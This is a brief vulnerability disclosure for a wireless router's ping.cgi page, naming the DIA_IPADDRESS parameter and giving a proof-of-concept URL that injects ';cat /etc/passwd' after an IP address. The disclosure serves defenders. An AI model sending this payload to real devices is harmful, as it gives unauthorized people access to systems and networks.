Below listed vulnerabilities enable an anonymous unauthorized attacker to gain access of network troubleshooting page (ping.cgi) on wireless router and inject commands to compromise full system/network.
Vulnerable module/page/application: ping.cgi
Vulnerable parameter: DIA_IPADDRESS
PoC URL: http(s)://<victim_IP>/ping.cgi?DIA_IPADDRESS=4.2.2.2;cat%20/etc/passwd